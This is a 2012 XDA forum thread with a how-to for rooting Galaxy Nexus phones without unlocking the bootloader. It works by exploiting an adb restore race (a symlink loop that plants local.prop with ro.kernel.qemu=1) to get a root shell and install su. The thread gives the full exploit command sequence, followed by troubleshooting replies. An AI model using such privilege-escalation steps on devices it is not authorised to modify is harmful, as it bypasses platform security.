5,593,293 Members 33,415 Now Online
XDA Developers Android and Mobile Development Forum

[HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)

Tip us?
 
efrant
Old
(Last edited by efrant; 2nd January 2013 at 03:43 PM.)
#1  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 7741
Posts: 9,353
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Arrow [HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)

As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer. (My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.

Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

Disclaimer: I take no credit for this exploit or the implementation of it. All credit goes to Bin4ry and his team. I just isolated the parts required for the GNex, modified it slightly and eliminated the script.

So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here. (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to backup our data, unlock the bootloader and restore the backup, so this is guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.

How this works
The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.

So what does this all mean:
  • You can now root any version of ICS and JB released to-date without having to unlock your bootloader (and without losing your data).
  • Moreover, you should now be able to root your device even if your hardware buttons are not working.
  • Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:
1) Please read the entire post before attempting this.
2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.
3) This assumes that you have USB Debugging enable on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.

Step-by-step:
1) Download the attached files to your computer and unzip them;
2) Open a command prompt in that same directory;
3) Copy the root files to your device:

adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk


4) Restore the fake "backup": adb restore fakebackup.ab Note: do not click restore on your device. Just enter the command into the command prompt on your PC and press the enter key.
5) Run the "exploit": adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" Note: when you enter this command, you should see your adb window flooded with errors -- this is what is supposed to happen.
6) Now that the "exploit" is running, click restore on your device.
7) Once it finishes, reboot your device: adb reboot Note: Do not try and use your device when it reboots. Running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker -- this is normal.
8) Once it is rebooted, open a shell: adb shell

Note: Once you do step 8, your should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11.)

Now we can copy su and Superuser.apk to the correct spots to give us root.

9) Mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) Change permissions on su: chmod 06755 /system/bin/su
12) Symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) Copy Superuser.apk to /system: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
14) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
15) Delete the file that the exploit created: rm /data/local.prop
16) Exit the ADB shell: exit (May have to type exit twice to get back to your command prompt.)
17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter): adb shell "sync; sync; sync;"
18) Reboot: adb reboot
19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.

Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:

10b) Change the owner of su: chown 0.0 /system/bin/su (Thanks maxrfon.)
Attached Files
File Type: zip Root-without-unlock.zip - [Click for QR Code] (1.52 MB, 12218 views)
I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
The Following 88 Users Say Thank You to efrant For This Useful Post: [ Click to Expand ]
 
Lorenzo_9
Old
#2  
Lorenzo_9's Avatar
Junior Member
Thanks Meter 1
Posts: 22
Join Date: Sep 2012
I've done all. It installs supersuser app but the phone is not really rooted and apps that requires it doesn't work
 
efrant
Old
#3  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 7741
Posts: 9,353
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Quote:
Originally Posted by Lorenzo_9 View Post
I've done all. It installs supersuser app but the phone is not really rooted and apps that requires it doesn't work
Did you try opening the Superuser app?

What happens when you open an app that requires root? Do you get the request for su access?
I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
The Following User Says Thank You to efrant For This Useful Post: [ Click to Expand ]
 
Lorenzo_9
Old
#4  
Lorenzo_9's Avatar
Junior Member
Thanks Meter 1
Posts: 22
Join Date: Sep 2012
You can open the app but whith apps that requires root there are no requestes and they don't... Even using root checker you see that you're not rooted
 
efrant
Old
#5  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 7741
Posts: 9,353
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Quote:
Originally Posted by Lorenzo_9 View Post
You can open the app but whith apps that requires root there are no requestes and they don't... Even using root checker you see that you're not rooted
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
The Following User Says Thank You to efrant For This Useful Post: [ Click to Expand ]
 
Lorenzo_9
Old
#6  
Lorenzo_9's Avatar
Junior Member
Thanks Meter 1
Posts: 22
Join Date: Sep 2012
Quote:
Originally Posted by efrant View Post
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?
 
efrant
Old
#7  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 7741
Posts: 9,353
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Quote:
Originally Posted by Lorenzo_9 View Post
Ok I'll do it and then I'll report you what happens. So now have you updated su and superuser.apk?
Yes, I put the latest versions in the zip in the first post.
I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
The Following User Says Thank You to efrant For This Useful Post: [ Click to Expand ]
 
serty4011
Old
#8  
Junior Member
Thanks Meter 6
Posts: 8
Join Date: Feb 2012
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.

Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
The Following 3 Users Say Thank You to serty4011 For This Useful Post: [ Click to Expand ]
 
efrant
Old
#9  
efrant's Avatar
Senior Moderator - OP
Thanks Meter 7741
Posts: 9,353
Join Date: Feb 2009
Location: Montreal Bow2DaCow

 
DONATE TO ME
Quote:
Originally Posted by serty4011 View Post
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.

Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
Thanks for confirming that step was not needed.
I do NOT answer technical questions via PM. Post in a thread.

Google Nexus 5

XDA Forum Rules & Moderator List

WHAT MATTERS IS UNDERSTANDING THE JOURNEY...
 
kong
Old
#10  
kong's Avatar
Senior Member
Thanks Meter 759
Posts: 1,154
Join Date: Jan 2012
Location: Bangkok
Thanks!

Bookmarked for future reference

Tags
bootloader, locked, root, unlock
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes